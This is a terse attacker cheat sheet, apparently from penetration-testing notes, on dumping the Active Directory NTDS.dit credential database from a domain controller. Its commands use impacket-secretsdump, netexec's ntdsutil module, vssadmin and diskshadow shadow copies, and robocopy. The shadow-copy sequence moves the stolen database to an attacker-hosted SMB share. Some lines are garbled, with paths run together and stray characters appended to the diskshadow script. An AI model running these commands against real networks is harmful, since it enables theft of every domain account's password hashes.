C:\\Windows\\NTDS\\ntds.ditimpacket-secretsdump [Domain]/[User]:[Password]@DC_$IP -just-dc -output dc_dump
nxc smb $IP -u [username] -p [password] -M ntdsutil
<aside>
vssadmin CREATE SHADOW /For=C:
Successfully created shadow copy for 'C:\\'
Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
Shadow Copy Volume Name: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2
C:\\NTDS> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit C:\\NTDS\\NTDS.dit
impacket-smbserver share . -smb2support -user test -password test
C:\\NTDS> cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$IP\\share
impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
</aside>
# save this in script.txt
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
# run diskshadow
diskshadow /s script.txt
# copy ntds to c
robocopy /b E:\Windows\ntds . ntds.dit